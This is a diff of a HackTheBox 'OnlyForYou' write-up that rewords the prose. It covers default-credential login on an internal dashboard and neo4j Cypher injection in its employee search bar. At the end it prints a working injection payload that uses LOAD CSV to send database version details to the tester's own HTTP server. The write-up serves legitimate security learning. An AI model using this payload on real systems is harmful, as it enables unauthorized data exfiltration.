F41zK4r1m/HackTheBox/OnlyForYou.md

 ![image](https://user-images.githubusercontent.com/87700008/234597676-01546cda-1a2b-43bb-b21f-a10f988d9293.png)
 ![image](https://user-images.githubusercontent.com/87700008/234597774-f0e7ef5c-bdce-465c-bf53-9b02a57ca2bc.png)

-After performing the port forwarding I loaded the service running on port 8001 & got a login page.
+After performing the port forwarding, I loaded the service running on port 8001 and got a login page.

 ![image](https://user-images.githubusercontent.com/87700008/234723074-604ea8a9-c6ff-44b4-8b22-38b169263aba.png)

-I tried different default credentials & finally found 'admin:admin' as a valid credentials.This is a website which is having multiple data hosted in it such as employee info, sales info, e-mails, etc.
+I tried different default credentials and finally found 'admin:admin' to be valid.
+This is a website with multiple data hosted on it, such as employee information, sales information, and e-mails.

 ![image](https://user-images.githubusercontent.com/87700008/234723577-225b8da6-381c-4294-bbce-f2a22c933e93.png)

-As I observed earlier there is a neo4j database running in the background & in this case when I browsed through the port 7474 service I got the neo4j console page as well.
-Which clearly indicates that the dashboard is running on the neo4j database.
+As I observed earlier, there is a neo4j database running in the background, and in this case, when I browsed through the port 7474 service, I got the neo4j console page as well, which clearly indicates that the dashboard is running on the neo4j database.

 ![image](https://user-images.githubusercontent.com/87700008/234723987-b9ef1fb0-5bfa-41ef-903d-8e6096b407ad.png)

 #### Injection:

-Since neo4j is a database this might be vulnerable to the injection as well just like a SQL DB.
-I started searching for the neo4j injection & found the injection methods on hacktriz website, known as [cypher injection neo4j](https://book.hacktricks.xyz/pentesting-web/sql-injection/cypher-injection-neo4j).
+Since neo4j is a database, it might be vulnerable to injection, just like an SQL DB.
+I started searching for neo4j injection methods and found the injection methods on the Hacktrix website, known as [cypher injection neo4j](https://book.hacktricks.xyz/pentesting-web/sql-injection/cypher-injection-neo4j).

-There is a search bar in the Employees section of the dashboard which probably looks vulnerable for the injection.
-I fired up the burp & intercepted the request to test it.
+There is a search bar in the Employees section of the dashboard that looked vulnerable to injection.
+I fired up Burp and intercepted the request to test it.

 ![image](https://user-images.githubusercontent.com/87700008/234725758-333bde8e-757a-420f-93b5-eea9346de4b0.png)

-I started checking with the **server version info** & passed this payload in the search parameter in URL enocded format.
-Also, as I am passing the http requests I also started my HTTP server.
+I began my exploration by checking the server version info.
+To do this, I passed a payload in URL-encoded format as a search parameter.
+As I was passing the HTTP requests, I also started my HTTP server.
+The payload I used was as follows:
 ```
 ' OR 1=1 WITH 1 as a  CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://10.0.2.4:8000/?version=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 //
 ```